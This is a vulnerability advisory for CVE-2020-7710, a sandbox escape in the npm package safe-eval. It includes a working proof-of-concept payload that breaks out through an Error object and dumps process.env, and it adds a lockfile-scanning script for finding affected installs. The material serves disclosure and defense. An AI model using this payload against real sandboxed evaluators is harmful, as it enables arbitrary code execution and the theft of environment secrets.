CVE-2020-7710 safe-eval

Package

Manager: npm
Name: safe-eval
Vulnerable Version: >=0 <=0.4.1

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.00513 (percentile: 0.65515)

Details

Sandbox Breakout / Arbitrary Code Execution in safe-eval

All versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system.

Evaluating the payload

```js
(function (){
  var ex = new Error
  ex.__proto__ = null
  ex.stack = {
    match: x => {
      return x.constructor.constructor("throw process.env")()
    }
  }
  return ex
})()
```

prints the contents of `process.env`.

## Recommendation

No fix is currently available. Consider using an alternative package until a fix is made available.
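Since the advisory lists no fixed release, the practical first step is finding every place `safe-eval` is installed, including as a transitive dependency. The following is an added example, not part of the advisory or of the package; it walks an npm lockfile in either the v1 or the v2/v3 layout, and the sample lockfiles and the package names `demo-rules` and `xsafe-eval` are constructed for illustration.

```javascript
// Added example: find safe-eval entries in an npm lockfile (v1, v2 or v3 layout).
const PKG = "safe-eval";
const MAX_VULNERABLE = [0, 4, 1]; // upper bound of the range on this page (<=0.4.1)

// Parse "x.y.z" (any pre-release/build suffix is ignored) into numbers.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(String(v));
  return m ? m.slice(1).map(Number) : null;
}
// True for >=0 <=0.4.1; unparseable versions count as in range for manual review.
function inVulnerableRange(v) {
  const p = parseVersion(v);
  if (!p) return true;
  for (let i = 0; i < 3; i++) {
    if (p[i] !== MAX_VULNERABLE[i]) return p[i] < MAX_VULNERABLE[i];
  }
  return true;
}

function findSafeEval(lock) {
  const hits = [];
  // lockfile v2/v3: flat "packages" map keyed by install path
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === `node_modules/${PKG}` || path.endsWith(`/node_modules/${PKG}`)) {
      hits.push({ path, version: meta.version, vulnerable: inVulnerableRange(meta.version) });
    }
  }
  // lockfile v1: nested "dependencies" tree; skipped when "packages" exists (v2 carries both)
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = [...trail, name].join(" > ");
      if (name === PKG) hits.push({ path, version: meta.version, vulnerable: inVulnerableRange(meta.version) });
      walk(meta.dependencies, [...trail, name]);
    }
  };
  if (!lock.packages) walk(lock.dependencies, []);
  return hits;
}

// Constructed sample lockfiles (not from a real project).
const sampleV3 = { lockfileVersion: 3, packages: {
  "node_modules/demo-rules": { version: "2.1.0" },
  "node_modules/demo-rules/node_modules/safe-eval": { version: "0.4.1" },
  "node_modules/xsafe-eval": { version: "1.0.0" }, // similar name, must not match
} };
const sampleV1 = { lockfileVersion: 1, dependencies: { "demo-rules": { version: "2.1.0", dependencies: { "safe-eval": { version: "0.3.0" } } } } };
console.log(findSafeEval(sampleV3), findSafeEval(sampleV1));
```

A version above 0.4.1 is reported with `vulnerable: false` only because it falls outside the range listed on this page; the advisory names no fixed release, so any hit is worth reviewing.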

Metadata

Created: 2020-08-25T23:40:53Z
Modified: 2023-09-11T23:01:24Z
Source: MANUAL
CWE IDs: ["CWE-94"]
Alternative ID: GHSA-hrpq-r399-whgw
Finding: F422
Auto approve: 1